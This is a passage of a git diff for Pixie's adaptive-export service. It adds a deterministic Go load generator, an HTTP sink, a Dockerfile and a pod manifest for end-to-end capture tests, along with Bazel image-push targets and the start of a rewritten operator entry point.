+# window; the harness deletes it after the rep is measured.
+apiVersion: v1
+kind: Pod
+metadata:
+ name: __NAME__
+ namespace: aeload
+ labels:
+ app: aeload-gen
+spec:
+ restartPolicy: Never
+ containers:
+ - name: gen
+ image: __IMAGE__
+ command: ["/usr/local/bin/cleanloadgen"]
+ env:
+ - {name: HTTP_ADDR, value: "__HTTP_ADDR__"}
+ - {name: HTTP_PATH, value: "/ping"}
+ - {name: HTTP_N, value: "__HTTP_N__"}
+ - {name: DNS_N, value: "__DNS_N__"}
+ - {name: DNS_BASE, value: "t-%d.aeload.svc.cluster.local."}
+ - {name: PG_ADDR, value: "__PG_ADDR__"}
+ - {name: PGSQL_N, value: "__PGSQL_N__"}
+ - {name: PG_USER, value: "postgres"}
+ - {name: PG_PASSWORD, value: "postgres"}
+ - {name: SETTLE_PRE_MS, value: "__SETTLE_PRE_MS__"}
+ - {name: SUSTAIN_SEC, value: "__SUSTAIN_SEC__"}
+ - {name: POD_NAME, valueFrom: {fieldRef: {fieldPath: metadata.name}}}
+ - {name: POD_NAMESPACE, valueFrom: {fieldRef: {fieldPath: metadata.namespace}}}
+ - {name: NODE_NAME, valueFrom: {fieldRef: {fieldPath: spec.nodeName}}}
diff --git a/src/e2e_test/adaptive_export_loadtest/tools/loadgen/Dockerfile b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/Dockerfile
new file mode 100644
index 00000000000..fd186588a19
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/Dockerfile
@@ -0,0 +1,18 @@
+# Build both load-test binaries (cleanloadgen + httpsink) into one small image.
+# Built on the PG dev-machine (native amd64 docker), never on the agent VM
+# (ARM, no bazel/heavy-build) — same path used for the dx images.
+FROM golang:1.22-bookworm AS build
+WORKDIR /src
+# -mod=mod lets the build resolve + record go.sum for the single lib/pq dep
+# without a pre-committed go.sum (keeps the tool tree minimal).
+ENV GOFLAGS=-mod=mod CGO_ENABLED=0
+COPY go.mod ./
+COPY cmd ./cmd
+RUN go build -trimpath -ldflags="-s -w" -o /out/cleanloadgen ./cmd/cleanloadgen
+RUN go build -trimpath -ldflags="-s -w" -o /out/httpsink ./cmd/httpsink
+
+FROM gcr.io/distroless/static-debian12:nonroot
+COPY --from=build /out/cleanloadgen /usr/local/bin/cleanloadgen
+COPY --from=build /out/httpsink /usr/local/bin/httpsink
+# Default to the sink; the generator pod overrides command to cleanloadgen.
+ENTRYPOINT ["/usr/local/bin/httpsink"]
diff --git a/src/e2e_test/adaptive_export_loadtest/tools/loadgen/cmd/cleanloadgen/main.go b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/cmd/cleanloadgen/main.go
new file mode 100644
index 00000000000..4c506eb4a31
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/cmd/cleanloadgen/main.go
@@ -0,0 +1,255 @@
+// cleanloadgen — a deterministic, "clean-cut" traffic generator for the
+// adaptive_export (AE) live data-plane load-tests.
+//
+// It is the OPPOSITE of a fuzzer: its only job is to emit an EXACTLY known
+// number of HTTP, DNS and PostgreSQL operations against fixed sinks, inside a
+// single sealed time band [B0,B1], and emit nothing else over the network. The
+// counts it prints are the ground-truth oracle the AE assertions compare
+// forensic_db row deltas against — no fabricated numbers anywhere.
+//
+// Determinism rules baked in (see the load-test design notes):
+// - HTTP: one NEW TCP connection per request (DisableKeepAlives) so both
+// http_events AND conn_stats counts are a function of HTTP_N. Every request
+// MUST return 2xx or the process exits non-zero (the rep is discarded, not
+// silently mis-counted).
+// - DNS: exactly ONE A-query per name via LookupNetIP(ip4) on a FQDN with a
+// trailing dot (suppresses /etc/resolv.conf search-domain expansion under
+// ndots:5) → dns_events == DNS_N. Names need not resolve; an NXDOMAIN is
+// still one captured query/response, so NXDOMAIN is not treated as failure.
+// - PGSQL: a single connection runs PGSQL_N separate `SELECT 1` statements →
+// pgsql_events == PGSQL_N.
+// - HTTP/PG endpoints are passed as IP:port (HTTP_ADDR / PG_ADDR), never DNS
+// names, so resolving the sinks themselves cannot pollute the DNS count.
+//
+// After firing, the process prints a one-line JSON manifest, emits the sentinel
+// AELOAD_FIRED, then HOLDS (sleeps until SIGTERM). Holding keeps the pod — and
+// therefore its upid — alive so Pixie's upid_to_pod_name can still resolve it
+// when AE queries the window AFTER the kubescape fixture is injected. The
+// harness deletes the pod once the rep is measured.
+package main
+
+import (
+ "context"
+ "database/sql"
+ "encoding/json"
+ "errors"
+ "fmt"
+ "io"
+ "net"
+ "net/http"
+ "os"
+ "os/signal"
+ "strconv"
+ "strings"
+ "syscall"
+ "time"
+
+ _ "github.com/lib/pq"
+)
+
+// manifest is the ground-truth record of one fired band. main marshals it to
+// JSON and prints it on a single line prefixed with "AELOAD_MANIFEST ".
+type manifest struct {
+ HTTP int `json:"http"` // http_events expected
+ DNS int `json:"dns"` // dns_events expected (A queries)
+ PGSQL int `json:"pgsql"` // pgsql_events expected
+ ConnTCPEst int `json:"conn_tcp_est"` // conn_stats TCP rows expected (tolerance gate)
+ B0 int64 `json:"b0"` // band start, unix nanos (node clock == Pixie time_)
+ B1 int64 `json:"b1"` // band end, unix nanos
+ // B0ISO / B1ISO are the same two instants formatted as UTC RFC3339Nano.
+ B0ISO string `json:"b0_iso"`
+ B1ISO string `json:"b1_iso"`
+ // Pod, Namespace and Node are taken from the POD_NAME (falling back to
+ // HOSTNAME), POD_NAMESPACE (default "aeload") and NODE_NAME env vars.
+ Pod string `json:"pod"`
+ Namespace string `json:"namespace"`
+ Node string `json:"node"`
+}
+
+// envInt returns the integer value of environment variable k, or def when k is
+// unset or empty. A non-empty value that is not an integer is fatal.
+func envInt(k string, def int) int {
+	raw := os.Getenv(k)
+	if raw == "" {
+		return def
+	}
+	n, err := strconv.Atoi(raw)
+	if err == nil {
+		return n
+	}
+	fatalf("env %s=%q is not an integer", k, raw)
+	return def
+}
+
+// envStr returns the value of environment variable k, or def when k is unset
+// or set to the empty string.
+func envStr(k, def string) string {
+	val := os.Getenv(k)
+	if val == "" {
+		return def
+	}
+	return val
+}
+
+// fatalf formats a message, writes it to stderr prefixed with "cleanloadgen: "
+// and terminated by a newline, then exits the process with status 1. It does
+// not return, and deferred functions in callers do not run.
+func fatalf(format string, a ...any) {
+ fmt.Fprintf(os.Stderr, "cleanloadgen: "+format+"\n", a...)
+ os.Exit(1)
+}
+
+// mustIPPort returns the value of environment variable k after checking that
+// it is set, splits as host:port, and that the host part is a literal IP
+// address. Any violation is fatal. The port itself is not validated.
+func mustIPPort(k string) string {
+	addr := os.Getenv(k)
+	if addr == "" {
+		fatalf("%s is required (IP:port, never a DNS name — see design)", k)
+	}
+	host, _, splitErr := net.SplitHostPort(addr)
+	if splitErr != nil {
+		fatalf("%s=%q is not host:port: %v", k, addr, splitErr)
+	}
+	if ip := net.ParseIP(host); ip == nil {
+		fatalf("%s host %q must be a literal IP, not a name, so it cannot add DNS events", k, host)
+	}
+	return addr
+}
+
+// main fires the counted band (HTTP, then DNS, then PGSQL), prints the
+// manifest and the AELOAD_FIRED sentinel, optionally trickles DNS lookups for
+// SUSTAIN_SEC seconds, and then blocks until SIGTERM/SIGINT.
+func main() {
+	var (
+		httpN     = envInt("HTTP_N", 100)
+		dnsN      = envInt("DNS_N", 100)
+		pgN       = envInt("PGSQL_N", 100)
+		httpAddr  = mustIPPort("HTTP_ADDR") // e.g. 10.43.0.10:8080
+		httpPath  = envStr("HTTP_PATH", "/ping")
+		dnsBase   = envStr("DNS_BASE", "t-%d.aeload.svc.cluster.local.") // trailing dot = FQDN
+		settlePre = time.Duration(envInt("SETTLE_PRE_MS", 1500)) * time.Millisecond
+	)
+	// PG is optional: PG_ADDR is only required (and validated) when PGSQL_N > 0.
+	// Validate before the band opens so a bad address cannot fail mid-band.
+	var pgAddr string
+	if pgN > 0 {
+		pgAddr = mustIPPort("PG_ADDR")
+	}
+
+	// Let the pod's networking settle and the upid register before the band
+	// opens, so no stray startup traffic lands inside [B0,B1].
+	time.Sleep(settlePre)
+
+	b0 := time.Now()
+	fireHTTP("http://"+httpAddr+httpPath, httpN)
+	fireDNS(dnsBase, dnsN)
+	if pgN > 0 {
+		firePGSQL(pgAddr, pgN)
+	}
+	b1 := time.Now()
+
+	m := manifest{
+		HTTP:       httpN,
+		DNS:        dnsN,
+		PGSQL:      pgN,
+		ConnTCPEst: httpN + boolToInt(pgN > 0), // HTTP_N new conns + 1 pg conn
+		B0:         b0.UnixNano(),
+		B1:         b1.UnixNano(),
+		B0ISO:      b0.UTC().Format(time.RFC3339Nano),
+		B1ISO:      b1.UTC().Format(time.RFC3339Nano),
+		Pod:        envStr("POD_NAME", os.Getenv("HOSTNAME")),
+		Namespace:  envStr("POD_NAMESPACE", "aeload"),
+		Node:       envStr("NODE_NAME", ""),
+	}
+	out, err := json.Marshal(m)
+	if err != nil {
+		fatalf("marshal manifest: %v", err)
+	}
+	fmt.Printf("AELOAD_MANIFEST %s\n", out)
+	fmt.Println("AELOAD_FIRED")
+
+	sig := make(chan os.Signal, 1)
+	signal.Notify(sig, syscall.SIGTERM, syscall.SIGINT)
+
+	// SUSTAIN: after the exact counted band, optionally keep a low continuous
+	// DNS trickle for SUSTAIN_SEC. A FRESH pod's traffic is often missed because
+	// Pixie/Stirling's eBPF attaches to the new process only after a scan cycle —
+	// so a one-shot band fires before capture begins (the "0 for freshly-flagged
+	// pods" symptom). A trickle keeps the pod observable for the whole window, so
+	// Pixie captures it once attached. Used by the sustained / "does AE keep
+	// writing until t_end" RCA (E8-data). For exact-count tests (E5) leave
+	// SUSTAIN_SEC=0 and instead pre-warm via SETTLE_PRE_MS so Stirling is already
+	// attached when the exact band fires.
+	if sustainSec := envInt("SUSTAIN_SEC", 0); sustainSec > 0 {
+		if sustainDNS(sig, dnsBase, dnsN, time.Duration(sustainSec)*time.Second) {
+			return
+		}
+	}
+
+	// HOLD: keep the pod (and its upid) alive so Pixie metadata still resolves
+	// upid_to_pod_name when AE queries the window. Harness deletes us when done.
+	<-sig
+}
+
+// fireHTTP issues n GET requests to url, each over a brand-new TCP connection.
+// Any transport error or non-2xx status is fatal.
+func fireHTTP(url string, n int) {
+	for i := 0; i < n; i++ {
+		// Fresh transport per request guarantees a new TCP connection.
+		tr := &http.Transport{DisableKeepAlives: true}
+		cl := &http.Client{Transport: tr, Timeout: 5 * time.Second}
+		resp, err := cl.Get(url)
+		if err != nil {
+			fatalf("http request %d/%d to %s failed: %v", i+1, n, url, err)
+		}
+		// Drain errors are ignored: the status check below decides the rep.
+		_, _ = io.Copy(io.Discard, resp.Body)
+		resp.Body.Close()
+		if resp.StatusCode/100 != 2 {
+			fatalf("http request %d/%d to %s: status %d (need 2xx)", i+1, n, url, resp.StatusCode)
+		}
+		tr.CloseIdleConnections()
+	}
+}
+
+// fireDNS performs n "ip4" lookups, one per name produced by formatting
+// dnsBase with the index 0..n-1. NXDOMAIN is accepted; any other error is fatal.
+func fireDNS(dnsBase string, n int) {
+	res := &net.Resolver{PreferGo: true}
+	for i := 0; i < n; i++ {
+		name := fmt.Sprintf(dnsBase, i)
+		if !strings.HasSuffix(name, ".") {
+			fatalf("DNS_BASE must yield an FQDN ending in '.' to suppress search expansion; got %q", name)
+		}
+		ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+		// ip4 → a single A query. NXDOMAIN is fine: the query/response is still
+		// one captured dns_event. Any OTHER error (timeout) means the query may
+		// not have completed deterministically → fail the rep.
+		_, err := res.LookupNetIP(ctx, "ip4", name)
+		cancel()
+		if err != nil && !isNXDomain(err) {
+			fatalf("dns lookup %d/%d for %s failed non-NXDOMAIN: %v", i+1, n, name, err)
+		}
+	}
+}
+
+// firePGSQL runs n `SELECT 1` statements against addr (host:port) on ONE pinned
+// connection. Pinning via db.Conn matters: queries issued on the *sql.DB pool
+// may be transparently retried on a new connection when the driver reports a
+// bad connection, which would silently break the "HTTP_N + 1 pg conn" estimate.
+// On a pinned Conn a broken connection surfaces as an error and fails the rep.
+func firePGSQL(addr string, n int) {
+	host, port, err := net.SplitHostPort(addr)
+	if err != nil {
+		fatalf("pg address %q is not host:port: %v", addr, err)
+	}
+	dsn := fmt.Sprintf("host=%s port=%s user=%s password=%s dbname=%s sslmode=disable connect_timeout=5",
+		host, port,
+		envStr("PG_USER", "postgres"), envStr("PG_PASSWORD", "postgres"), envStr("PG_DB", "postgres"))
+	db, err := sql.Open("postgres", dsn)
+	if err != nil {
+		fatalf("pg open: %v", err)
+	}
+	db.SetMaxOpenConns(1)
+	db.SetMaxIdleConns(1)
+
+	conn, err := db.Conn(context.Background())
+	if err != nil {
+		fatalf("pg connect: %v", err)
+	}
+	for i := 0; i < n; i++ {
+		var one int
+		// Bound each statement like the HTTP and DNS operations so a stalled
+		// sink fails the rep instead of hanging it forever.
+		ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+		err := conn.QueryRowContext(ctx, "SELECT 1").Scan(&one)
+		cancel()
+		if err != nil {
+			fatalf("pg query %d/%d failed: %v", i+1, n, err)
+		}
+	}
+	// Teardown is best-effort: every counted statement has already completed.
+	_ = conn.Close()
+	_ = db.Close()
+}
+
+// sustainDNS performs one "ip4" lookup per second for duration d, using names
+// formatted from dnsBase with indices starting at start (so they are distinct
+// from the counted band's names). Lookup results and errors are ignored. It
+// returns true if a signal arrived on sig before the deadline, false otherwise.
+func sustainDNS(sig <-chan os.Signal, dnsBase string, start int, d time.Duration) bool {
+	deadline := time.Now().Add(d)
+	ticker := time.NewTicker(time.Second)
+	defer ticker.Stop()
+	// Trickle DISTINCT DNS lookups (one A-query each) — a protocol Pixie
+	// reliably traces — so every AE re-pull pass sees NEW rows and we can
+	// observe the C15 "keep writing until t_end" contract. (HTTP trickle was
+	// invisible on rigs where Pixie isn't tracing HTTP.)
+	res := &net.Resolver{PreferGo: true}
+	for i := start; time.Now().Before(deadline); {
+		select {
+		case <-sig:
+			return true
+		case <-ticker.C:
+			ctx, cancel := context.WithTimeout(context.Background(), 3*time.Second)
+			_, _ = res.LookupNetIP(ctx, "ip4", fmt.Sprintf(dnsBase, i))
+			cancel()
+			i++
+		}
+	}
+	return false
+}
+
+// boolToInt maps true to 1 and false to 0.
+func boolToInt(b bool) int {
+	n := 0
+	if b {
+		n = 1
+	}
+	return n
+}
+
+// isNXDomain reports whether err is a "no such host" DNS error (the expected,
+// fully-deterministic outcome for synthetic names) rather than a transport
+// failure that would make the query count non-deterministic.
+// isNXDomain reports whether err is, or wraps, a *net.DNSError whose
+// IsNotFound flag is set. Every other error, including nil, yields false.
+func isNXDomain(err error) bool {
+	var dnsErr *net.DNSError
+	return errors.As(err, &dnsErr) && dnsErr.IsNotFound
+}
diff --git a/src/e2e_test/adaptive_export_loadtest/tools/loadgen/cmd/httpsink/main.go b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/cmd/httpsink/main.go
new file mode 100644
index 00000000000..efe076af467
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/cmd/httpsink/main.go
@@ -0,0 +1,30 @@
+// httpsink — a minimal HTTP server for the AE load-test data plane.
+//
+// It exists only to terminate cleanloadgen's counted HTTP requests with a 200
+// and zero side effects. No logging, no metrics endpoint, no readiness/liveness
+// surface — anything extra would be captured by Pixie and pollute the per-pod
+// http_events / conn_stats counts on the sink side. (AE filters to the client
+// pod, so the sink's rows are excluded anyway, but keeping it silent removes any
+// chance of cross-talk.)
+package main
+
+import (
+ "net/http"
+ "os"
+)
+
+// main serves a fixed 200 "ok\n" response for every path on LISTEN_ADDR
+// (default ":8080") and panics if the listener stops with an error.
+func main() {
+	listen := os.Getenv("LISTEN_ADDR")
+	if listen == "" {
+		listen = ":8080"
+	}
+
+	// Single catch-all handler: explicit 200 followed by a three-byte body.
+	respondOK := func(w http.ResponseWriter, _ *http.Request) {
+		w.WriteHeader(http.StatusOK)
+		_, _ = w.Write([]byte("ok\n"))
+	}
+	router := http.NewServeMux()
+	router.HandleFunc("/", respondOK)
+
+	server := &http.Server{Addr: listen, Handler: router}
+	err := server.ListenAndServe()
+	if err != nil {
+		panic(err)
+	}
+}
diff --git a/src/e2e_test/adaptive_export_loadtest/tools/loadgen/go.mod b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/go.mod
new file mode 100644
index 00000000000..4ad12205416
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/go.mod
@@ -0,0 +1,5 @@
+module aeload
+
+go 1.22
+
+require github.com/lib/pq v1.10.9
diff --git a/src/stirling/source_connectors/socket_tracer/testing/container_images/BUILD.bazel b/src/stirling/source_connectors/socket_tracer/testing/container_images/BUILD.bazel
index bcb150a2802..38fa4950c16 100644
--- a/src/stirling/source_connectors/socket_tracer/testing/container_images/BUILD.bazel
+++ b/src/stirling/source_connectors/socket_tracer/testing/container_images/BUILD.bazel
@@ -24,29 +24,29 @@ package(default_visibility = [
# Generate all Go container library permutations for supported Go versions.
go_container_libraries(
- container_type = "grpc_server",
bazel_sdk_versions = pl_all_supported_go_sdk_versions,
+ container_type = "grpc_server",
prebuilt_container_versions = pl_go_test_versions,
)
# Stirling test cases usually test server side tracing. Therefore
# we only need to provide the bazel SDK versions for the client containers.
go_container_libraries(
- container_type = "grpc_client",
bazel_sdk_versions = pl_all_supported_go_sdk_versions,
+ container_type = "grpc_client",
)
go_container_libraries(
- container_type = "tls_server",
bazel_sdk_versions = pl_all_supported_go_sdk_versions,
+ container_type = "tls_server",
prebuilt_container_versions = pl_go_test_versions,
)
# Stirling test cases usually test server side tracing. Therefore
# we only need to provide the bazel SDK versions for the client containers.
go_container_libraries(
- container_type = "tls_client",
bazel_sdk_versions = pl_all_supported_go_sdk_versions,
+ container_type = "tls_client",
)
pl_cc_test_library(
diff --git a/src/vizier/services/adaptive_export/BUILD.bazel b/src/vizier/services/adaptive_export/BUILD.bazel
index 38773121091..b352fa213f6 100644
--- a/src/vizier/services/adaptive_export/BUILD.bazel
+++ b/src/vizier/services/adaptive_export/BUILD.bazel
@@ -14,6 +14,8 @@
#
# SPDX-License-Identifier: Apache-2.0
+load("@io_bazel_rules_docker//container:container.bzl", "container_bundle")
+load("@io_bazel_rules_docker//contrib:push-all.bzl", "container_push")
load("//bazel:pl_build_system.bzl", "pl_go_image")
pl_go_image(
@@ -24,3 +26,27 @@ pl_go_image(
"//src/vizier:__subpackages__",
],
)
+
+# Single-image bundle + push targets — same shape as
+# //k8s/vizier:image_bundle / vizier_images_push, but scoped to ONLY
+# the adaptive_export image so the SBOB PoC can rebuild this one
+# component without rebuilding kelvin / pem / metadata. Consumed by
+# .github/workflows/adaptive_export_image.yaml via
+# `bazel run :adaptive_export_image_push` with the standard
+# --//k8s:image_repository / --//k8s:image_version overrides.
+container_bundle(
+ name = "adaptive_export_image_bundle",
+ images = {
+ "$(IMAGE_PREFIX)/vizier-adaptive_export_image:$(BUNDLE_VERSION)": ":adaptive_export_image",
+ },
+ toolchains = [
+ "//k8s:image_prefix",
+ "//k8s:bundle_version",
+ ],
+)
+
+container_push(
+ name = "adaptive_export_image_push",
+ bundle = ":adaptive_export_image_bundle",
+ format = "Docker",
+)
diff --git a/src/vizier/services/adaptive_export/cmd/BUILD.bazel b/src/vizier/services/adaptive_export/cmd/BUILD.bazel
index e5cc4fe7423..1ebaf3c27cd 100644
--- a/src/vizier/services/adaptive_export/cmd/BUILD.bazel
+++ b/src/vizier/services/adaptive_export/cmd/BUILD.bazel
@@ -24,10 +24,21 @@ go_library(
visibility = ["//visibility:private"],
deps = [
"//src/api/go/pxapi",
+ "//src/shared/services",
+ "//src/vizier/services/adaptive_export/internal/activeset",
+ "//src/vizier/services/adaptive_export/internal/clickhouse",
"//src/vizier/services/adaptive_export/internal/config",
+ "//src/vizier/services/adaptive_export/internal/control",
+ "//src/vizier/services/adaptive_export/internal/controller",
+ "//src/vizier/services/adaptive_export/internal/passthrough",
"//src/vizier/services/adaptive_export/internal/pixie",
+ "//src/vizier/services/adaptive_export/internal/pixieapi",
"//src/vizier/services/adaptive_export/internal/pxl",
+ "//src/vizier/services/adaptive_export/internal/reconcile",
"//src/vizier/services/adaptive_export/internal/script",
+ "//src/vizier/services/adaptive_export/internal/sink",
+ "//src/vizier/services/adaptive_export/internal/streaming",
+ "//src/vizier/services/adaptive_export/internal/trigger",
"@com_github_sirupsen_logrus//:logrus",
],
)
diff --git a/src/vizier/services/adaptive_export/cmd/main.go b/src/vizier/services/adaptive_export/cmd/main.go
index 10d178f6b3f..7cb5ae6d1ee 100644
--- a/src/vizier/services/adaptive_export/cmd/main.go
+++ b/src/vizier/services/adaptive_export/cmd/main.go
@@ -14,394 +14,876 @@
//
// SPDX-License-Identifier: Apache-2.0
+// Adaptive-export operator (push flow, design rev 2).
+//
+// Lifecycle (one pod per node, deployed as a DaemonSet):
+//
+// 1. boot:
+// - load config (env + k8s downward API for NODE_NAME)
+// - ensure ClickHouse retention plugin is enabled (idempotent;
+// retention scripts themselves are user-defined in the Pixie UI)
+// - rehydrate the in-memory active set from
+// forensic_db.adaptive_attribution FINAL WHERE hostname=
+// - start the trigger + controller
+//
+// 2. steady state:
+// - trigger polls forensic_db.kubescape_logs WHERE hostname=
+// - controller derives anomaly hash from each event and writes a
+// forensic_db.adaptive_attribution row (one INSERT per event;
+// ReplacingMergeTree(t_end) collapses re-inserts to the latest
+// end_time, extending the active window)
+//
+// 3. shutdown:
+// - on SIGINT/SIGTERM, cancel context, drain.
package main
import (
"context"
"fmt"
+ "net/http"
+ _ "net/http/pprof" // registers /debug/pprof/* on http.DefaultServeMux; served only by the debug listener that AE_PPROF_ADDR enables
"os"
"os/signal"
+ "strconv"
"strings"
+ "sync"
"syscall"
"time"
log "github.com/sirupsen/logrus"
"px.dev/pixie/src/api/go/pxapi"
+ "px.dev/pixie/src/shared/services"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse"
"px.dev/pixie/src/vizier/services/adaptive_export/internal/config"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/control"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/controller"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/passthrough"
"px.dev/pixie/src/vizier/services/adaptive_export/internal/pixie"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/pixieapi"
"px.dev/pixie/src/vizier/services/adaptive_export/internal/pxl"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile"
"px.dev/pixie/src/vizier/services/adaptive_export/internal/script"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/streaming"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger"
)
const (
- defaultRetries = 100
- defaultSleepTime = 15 * time.Second
- schemaCreationInterval = 2 * time.Minute
- setupTimeout = 30 * time.Second
- scriptExecutionTimeout = 60 * time.Second
-)
-
-const (
- schemaCreationScriptTmpl = `
-import px
-px.display(px.CreateClickHouseSchemas(
- host="%s",
- port=%s,
- username="%s",
- password="%s",
- database="%s"
-))
-`
- detectionScriptTmpl = `
-import px
-
-df = px.DataFrame('%s', clickhouse_dsn='%s', start_time='-%ds')
-df.alert = df.message
-df.namespace = px.pluck(df.RuntimeK8sDetails, "podNamespace")
-df.podName = px.pluck(df.RuntimeK8sDetails, "podName")
-df.time_ = px.int64_to_time(df.event_time * 1000000000)
-df = df[['time_', 'alert', 'namespace', 'podName']]
-px.display(df)
-`
+ // envCHHTTPEndpoint overrides the ClickHouse HTTP endpoint used by
+ // both the trigger (poll kubescape_logs) and the sink (write
+ // adaptive_attribution). Defaults to http://<clickhouse-host>:8123.
+ envCHHTTPEndpoint = "FORENSIC_CH_HTTP_ENDPOINT"
+
+ // envNodeName is the k8s downward API var the DaemonSet sets via
+ // `valueFrom: fieldRef: spec.nodeName`. Required: startup fails when unset.
+ envNodeName = "NODE_NAME"
+
+ // envWindowBeforeSec / envWindowAfterSec / envTriggerPollMS /
+ // envPruneIntervalSec are programmatic overrides per the spec.
+ envWindowBeforeSec = "ADAPTIVE_WINDOW_BEFORE_SEC"
+ envWindowAfterSec = "ADAPTIVE_WINDOW_AFTER_SEC"
+ envTriggerPollMS = "ADAPTIVE_TRIGGER_POLL_MS"
+ envPruneIntervalSec = "ADAPTIVE_PRUNE_INTERVAL_SEC"
+
+ // envPushRefreshSec overrides controller.PushRefreshInterval. Unset →
+ // 30s default. A NEGATIVE value selects single-shot mode (one pull per
+ // anomaly window), which the load-test harness uses so the non-deduping
+ // MergeTree protocol tables get each window exactly once.
+ envPushRefreshSec = "ADAPTIVE_PUSH_REFRESH_SEC"
+
+ // envTriggerHTTPTimeoutSec — per-poll HTTP budget (default 30s).
+ // The pre-watermark 5s default timed out every catch-up SELECT.
+ envTriggerHTTPTimeoutSec = "ADAPTIVE_TRIGGER_HTTP_TIMEOUT_SEC"
+
+ // envTriggerPollLimit — max rows fetched per poll (default 10000).
+ // Bounds catch-up work after a restart so a backlog of N rows
+ // drains in ceil(N/PollLimit) polls instead of one giant scan.
+ envTriggerPollLimit = "ADAPTIVE_TRIGGER_POLL_LIMIT"
+
+ // envWatermarkSaveSec — minimum interval between persistent
+ // watermark INSERTs (default 5s). The in-memory watermark
+ // advances every successful poll; flush is throttled.
+ envWatermarkSaveSec = "ADAPTIVE_WATERMARK_SAVE_SEC"
+
+ // envSkipApply lets a deployment opt out of in-process DDL when
+ // the schema has been pre-applied by a separate Job (recommended
+ // production split: high-priv Job for CREATE TABLE / ALTER, then
+ // the operator runs with INSERT-only creds and skips Apply).
+ // VerifyPixieSchema still runs and refuses to start on drift.
+ envSkipApply = "ADAPTIVE_SKIP_APPLY"
+
+ // envInstallPresets makes the operator boot install Pixie's preset
+ // retention scripts on this cluster. One-shot, idempotent (script-name
+ // match → skip). Defaults to false because the production design has
+ // users author scripts in the Pixie UI.
+ envInstallPresets = "INSTALL_PRESET_SCRIPTS"
+
+ // === Throughput-protection knobs for the pushPixieRows fan-out.
+ // All default to 0 (= legacy unbounded behavior preserved).
+ envMaxParallelQueriesPerHash = "ADAPTIVE_MAX_PARALLEL_QUERIES_PER_HASH"
+ envMaxInflightQueriesGlobal = "ADAPTIVE_MAX_INFLIGHT_QUERIES_GLOBAL"
+ envEmptyResultSkipAfterN = "ADAPTIVE_EMPTY_RESULT_SKIP_AFTER_N"
+ envEmptyResultSkipTTLSec = "ADAPTIVE_EMPTY_RESULT_SKIP_TTL_SEC"
+
+ // envPushPixieTables — when true, the operator queries vizier
+ // directly via pxapi on each fresh anomaly and writes the resulting
+ // rows to forensic_db.<table> (rev-1 path). Required when the
+ // cloud's retention plugin can't reach the in-cluster CH (e.g.
+ // AOCC pixie cloud + CH ClusterIP service).
+ envPushPixieTables = "ADAPTIVE_PUSH_PIXIE_ROWS"
+
+ // envAdaptiveWriteMode selects the protocol-table write path:
+ // "pull" → rev-2: per-hash×per-table fan-out (default)
+ // "streaming" → rev-3: N TableScanners with shared allowlist
+ // (see .local/adaptive-write-rev3-plan.md)
+ envAdaptiveWriteMode = "ADAPTIVE_WRITE_MODE"
+
+ // envPassthrough — firehose mode counterpart to the anomaly-gated
+ // path. When "true", a single background loop queries every pixie
+ // observation table with an empty Target (no ns/pod predicate),
+ // over the rolling window, and writes the result via the existing
+ // sink. Enables A/B measurement of AE's capture fraction by
+ // running the same workload+window twice with the env flipped.
+ envPassthrough = "ADAPTIVE_PASSTHROUGH"
+ envPassthroughWindow = "ADAPTIVE_PASSTHROUGH_WINDOW_SEC"
+ envPassthroughRefresh = "ADAPTIVE_PASSTHROUGH_REFRESH_SEC"
+ // envPassthroughCompiled — selects the firehose query path. Default
+ // ON: per-table PxL is precompiled once and all tables are pulled
+ // concurrently per tick. Set to "false" to revert to the legacy path
+ // (QueryFor rebuilt per tick, tables walked serially).
+ envPassthroughCompiled = "ADAPTIVE_PASSTHROUGH_COMPILED"
+
+ // envReconcile — per-pull write-fidelity instrument. When "true",
+ // every data-plane pull (filter / passthrough / streaming) records
+ // one forensic_db.ae_reconcile row (read_count vs wrote_count, window,
+ // pod) so a reconcile run can localize loss to query (R5) vs sink (R6).
+ // Off by default; the recorder is reconcile.Nop{} unless set.
+ envReconcile = "ADAPTIVE_RECONCILE"
)
-func renderSchemaScript(cfg config.ClickHouse) string {
- return fmt.Sprintf(schemaCreationScriptTmpl,
- cfg.Host(), cfg.Port(), cfg.User(), cfg.Password(), cfg.Database())
-}
-
-func renderDetectionScript(cfg config.ClickHouse, lookback int64) string {
- return fmt.Sprintf(detectionScriptTmpl, cfg.Table(), cfg.DSN(), lookback)
-}
-
func main() {
+ // Wire AE into the shared pixie service scaffold:
+ // - SetupService registers --version + ports.
+ // - SetupSSLClientFlags adds the client TLS flags pxapi uses
+ // when --disable_ssl=false (cluster TLS into vizier).
+ // - PostFlagSetupAndParse runs pflag.Parse and binds viper to
+ // PL_*-prefixed env vars (so PL_JWT_SIGNING_KEY etc. work
+ // without any custom os.Getenv plumbing).
+ // - SetupServiceLogging switches logrus to JSON for log shippers.
+ // AE doesn't run a gRPC server, so CheckServiceFlags is skipped —
+ // it panics on missing --server_tls_key/cert which AE has no use
+ // for.
+ services.SetupService("adaptive-export", 50900)
+ services.SetupSSLClientFlags()
+ services.PostFlagSetupAndParse()
+ services.SetupServiceLogging()
+
ctx, cancel := context.WithCancel(context.Background())
defer cancel()
- log.Info("Starting the ClickHouse Adaptive Export service")
+ // Debug pprof listener — gated on AE_PPROF_ADDR (e.g. "127.0.0.1:6060").
+ // Off by default; when set, /debug/pprof/* on that addr exposes the
+ // runtime profiles for live CPU / heap / goroutine investigations. The
+ // blank-import of net/http/pprof above registers the handlers on the
